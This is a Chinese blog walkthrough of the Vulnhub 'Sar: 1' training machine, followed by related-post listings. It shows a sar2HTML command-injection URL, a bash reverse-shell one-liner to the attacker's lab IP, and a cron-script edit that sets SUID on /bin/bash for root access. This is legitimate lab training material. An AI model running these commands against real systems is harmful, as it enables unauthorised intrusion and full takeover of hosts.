Vulnhub:Sar 1靶机

已于 2023-06-07 23:28:02 修改
阅读量124 收藏
点赞数
文章标签: 安全 网络安全 web安全
于 2023-04-21 15:20:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/130289569
版权

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

查看目标网站robots.txt,提示存在一个目录sar2HTML

访问sar2HTML目录发现是sar2HTML CMS

搜索后发现该CMS存在远程代码执行

searchsploit sar2HTML

漏洞利用

执行命令

http://192.168.111.130/sar2HTML/index.php?plot=;命令

反弹shell需要url编码

bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/4444 0>&1'

提权

查看目标计划任务,发现每5分钟以root身份执行/var/www/html/finally.sh

finally.sh会执行write.sh,而write.sh有777权限,修改write.sh提升为root

echo 'chmod 4777 /bin/bash' >> write.sh
/bin/bash -p

ctostm
关注
vulnhub:Sar
cjstang的博客
06-16 802
OSCP-2:这次练习的靶机vulnhub平台下的sar,该靶机是一个类似oscp的虚拟机,目的是提高并巩固渗透测试的知识点。 主要利用方式:sar2HTML命令执行反弹shell(可php文件上传反弹shell)+定时脚本提权......
sar1靶机练习
SYJ_361的博客
04-01 5314
本文通过kali渗透sar1靶机获得root权限,利用kali找到对应的模块,查看漏洞信息,构造payload下载文件,用蚁剑反弹shell,最终获得root权限
vulnhub 靶机渗透:SAR: 1
Mysmycbx的博客
05-16 574
发现了robots.txt,打开发现sar2HTML,打开http://192.168.54.13/sar2HTML,发现是个工具,且告诉了版本号。可以root权限执行write.sh,但可以修改write.sh,那就修改为反弹shell。,既然是工具就可能存在漏洞,去searchsploit搜一下。发现执行成功了,那就说明该漏洞是存在的。然后静静地等待5分钟,就获取了root权限的反弹shell。发现有个root权限执行的定时任务,且5分钟执行一次。发现了2个且版本都是对应的,试试。
VulnhubSar-1
ki10Moc的博客
07-21 246
垃圾文章不要看
[VulnHub靶机渗透] Sar: 1
人若无名,便可专心练剑
02-07 1005
靶机精讲 之 SARvulnhub靶机,盲打这台机器吧,老手测试一下宝刀,新手验证一下成长!标准的攻击链,却也需要你的腾挪躲闪。sar2html利用获得立足点,自动任务提权,很简单,但也未必打得很顺利,实战就是这样,大处的利用你要会,小的知识点、技能点也不能含糊。小试牛刀一下,you can do it!
Vulnhub靶机SAR_ 1
LainWith的博客
08-20 250
Sar(此系列共1台)发布日期:2020 年 2 月 15 日难度:初级运行环境:VMware目标:取得Root权限nmap漏扫脚本目录爆破远程代码执行计划任务提权。
Vulnhub-靶机-Sar 1
qq_43264813的博客
01-27 1316
Vulnhub靶机Sar 1 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/sar-1,425/ 文章目录Vulnhub靶机Sar 1一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.110.0/24 【步骤二】对目标靶机进行全端口扫描: 【命令】nmap -n -sC -s
vulnhub Sar: 1
箭雨镜屋
05-04 1283
渗透思路:nmap扫描----dirb扫描网站目录----exploit-db查找exp----利用sar2html的RCE漏洞getshell(base64编码)----利用定时任务提权
SAR靶机笔记
LINGX5的博客
08-17 350
先用 nmap 扫描,发现目标靶机开启了 80 端口 http 的常规服务,并发现几个常规的路径访问 80 端口暴露出来的路径,在robots.txt中发现sar2HTML目录,打开后看到一个 cms 框架在 searchsploit 中搜走 sar2HTML 找到 RCE 漏洞利用 RCE 漏洞获得立足点利用定时任务提权到了 rootoot@sar:~#成功获取到 root 权限### 总结。
vulnhub靶机sar
0of_blog
05-01 946
看一下exploitdb给出的文件,文件位置:/usr/share/exploitdb。发现两个目录:/robots.txt和/phpinfo.php,分别进去看看。发现有个脚本以root身份每5分钟执行一次,尝试修改这个脚本为反弹shell。finally.sh又调用了write.sh,所以可以去修改write.sh。尝试用msf生成一个php反弹shell,并且开启web服务端口。只开放了80,进去看一眼,发现就是默认apache页面。
sar成像matlab代码-SAR-coregistration-repl:SAR-注册-repl
06-03
SAR/SAR 配准,然后用于其他遥感图像配准,包括异构图像配准(例如 LIDAR/SAR、光学/ SAR、高光谱/光学等) 我们希望此代码会有所帮助,我们将继续为您服务,我们有兴趣回复您的评论。 {ge ,e, _}Folki 算法的引用:...
SAR-PROCESSING:SAR图像处理算法
04-02
SAR处理 处理SAR图像的功能。 这些功能允许通过分解为脚本的分解查看大型SAR图像。 要运行脚本,您需要使用读取功能将图像加载到内存中,输入行和列编号,可以在图像随附的.ann文件中找到。 图像可以二进制格式从...
matlab三维图像代码-sar:SAR成像的自动聚焦和图像处理算法
05-20
该存储库包含用于SAR图像处理和自动聚焦算法的所有源代码。 有关详细信息,请参阅每个子目录的README 。 data_collection 所有用于实时收集雷达数据的程序。 2d_autofocus 与3d_autofocus类似,但仅适用于二维光圈。...
安全知识见闻-脚本语言对与安全的重要性
2201_75446043的博客
10-27 1135
批处理文件是以.bat扩展名结尾的文本文件,其中包含一系列命令,通常用于自动化任务。在Windows操作系统中,批处理文件可以通过命令提示符(CMD)运行。PowerShell是微软推出的一种任务自动化和配置管理框架,结合了命令行界面和脚本语言的特性。它的命令称为“cmdlet”,支持对象导向,能够处理复杂的数据结构。编写宏病毒、脚本病毒、BIOS病毒或进行内网渗透都需要特定的技术知识和编程技能,类似的脚本病毒还有很多,无法一一列举。
API接口开放与安全管控 - 原理与实践
whisperzzza的博客
10-27 1289
API安全是接口开放的前提条件 在API对外开放时,确保其安全性至关重要,因为API直接暴露给外部环境,容易成为攻击目标。一旦被恶意利用,可能导致数据泄露、服务滥用等严重后果。因此,通过API网关实施严格的接口安全管理措施,如身份验证、访问控制和流量限制,成为保护后端服务免受威胁的第一道防线。这不仅有助于维护系统的稳定性和可靠性,还能增强用户对平台的信任度。
服务攻防之开发组件安全
qq_63831588的博客
10-28 1129
log4j 是 Apache 的一个开源日志库,是一个基于 Java 的日志记录框架,Log4j2 是 log4j 的后继者,其中引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI 组建等,被应用于业务系统开发,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞,成功利用该漏洞可在目标服务器上执行任意代码。
前端如何安全存储密钥,防止信息泄露
最新发布
AM1n98的博客
10-30 947
把公钥写在前端代码文件里被公司检测到了要整改,整理几种常见的前端密钥存储方案。
【万户软件-注册安全分析报告-无验证方式导致安全隐患】
10-27 731
北京万户软件技术有限公司(简称“万户软件”)是北京华宇软件股份有限公司(股票简称:“华宇软件”,股票代码:300271)的全资⼦公司,创始于1998年,总部位于北京经开区信创园,二十余年专注数字办公协同业务。公司围绕智慧政务、企业数字化转型、信创改造等业务领域,为各级政府部⻔、⼤型集团企业及相关⾏业单位提供从规划咨询、应⽤软件、实施交付到持续运营维护的全⽅位服务。
【商汤科技-注册/登录安全分析报告】
10-26 1553
作为人工智能软件公司,商汤科技以“坚持原创,让AI引领人类进步”为使命,旨在持续引领人工智能前沿研究,持续打造更具拓展性更普惠的人工智能软件平台,推动经济、社会和人类的发展,并持续吸引及培养顶尖人才,共同塑造未来。商汤科技拥有深厚的学术积累,并长期投入于原创技术研究,不断增强行业领先的多模态、多任务通用人工智能能力。
InSAR原理:SAR干涉处理与解释指南
1. **SAR基础**:包括SAR成像原理、波束形成、数据采集模式以及SAR图像的特点,这些是理解InSAR技术的基础。 2. **干涉生成**:描述如何通过配对SAR图像创建干涉图,解释相位差异的物理含义以及与地表位移的关系。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值